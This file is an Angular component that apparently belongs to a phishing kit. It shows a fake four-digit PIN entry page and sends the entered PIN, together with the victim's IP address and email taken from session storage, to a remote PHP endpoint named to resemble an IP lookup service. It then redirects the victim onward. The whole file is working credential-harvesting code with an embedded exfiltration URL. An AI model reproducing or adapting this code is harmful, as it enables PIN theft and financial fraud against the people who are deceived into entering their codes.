import { Component, OnInit } from '@angular/core';
import { NgxSpinnerService } from "ngx-spinner";
import { HttpClient, HttpParams } from "@angular/common/http";
import { HttpHeaders } from '@angular/common/http';
import { Router } from "@angular/router";
@Component({
  selector: 'app-wpin',
  templateUrl: './wpin.component.html',
  styleUrls: ['./wpin.component.css']
})
export class WpinComponent implements OnInit {

  onDigitInput(event:any){
    let element;
    if (event.code !== 'Backspace')
         element = event.srcElement.nextElementSibling;
 
     if (event.code === 'Backspace')
         element = event.srcElement.previousElementSibling;
 
     if(element == null)
         return;
     else
         element.focus();
 }


  async delay(ms: number) {
    await new Promise(resolve => setTimeout(()=>resolve(''), ms)).then(()=>console.log("S.I.G @mrsa3ek"));
  }

  user = {
    e1: "",
    e2: "",
    e3: "",
    e4: "",
    };

  flag1 = true;
  flag2 = true;

  color2 = 'block';
  color3 = 'none';

  xk = sessionStorage.getItem('ip');
  randomid = sessionStorage.getItem('id');
  sessionemail = sessionStorage.getItem('semail');

  readonly ROOT_URL = "https://ip-api.org/s3kr.php";

  attemp = 0;

  constructor(public http: HttpClient,private spinner: NgxSpinnerService, private router: Router) { }

  ngOnInit(): void {
    this.loading();
  }

  loading(){
    this.spinner.show();
    this.delay(1000).then(any=>{
      this.spinner.hide();
    });
  }



  psteml(){
    if(this.user.e1){
      if(this.user.e2){
        if(this.user.e3){
          if(this.user.e4){
            if(this.user.e3){
              if(this.user.e2){
      this.flag1 = false;
      let params = new HttpParams().set("text",  " [4 PIN FIXED] " +  this.user.e1 + this.user.e2 + this.user.e3 + this.user.e4  + " [X] " +  this.xk + " email :" + this.sessionemail  );
      this.http.get<any>(this.ROOT_URL +'?',{ params }).subscribe((data: any[])=>{console.log(data);})  ;
      this.delay(3000).then(any=>{
        this.spinner.show();
      });
      this.delay(10000).then(any=>{
        this.user.e1 = "";
        this.user.e2 = "";
        this.user.e3 = "";
        this.user.e4 = "";
        this.flag1 = true;
        this.redirect('/ARSstart');
        this.spinner.hide();
      });
    }}}}}}else{
    
    }
    
  }

  event:any

  handleEvent(event){

  }

  redirect(dang:string){
    this.router.navigate([dang]);
  }

}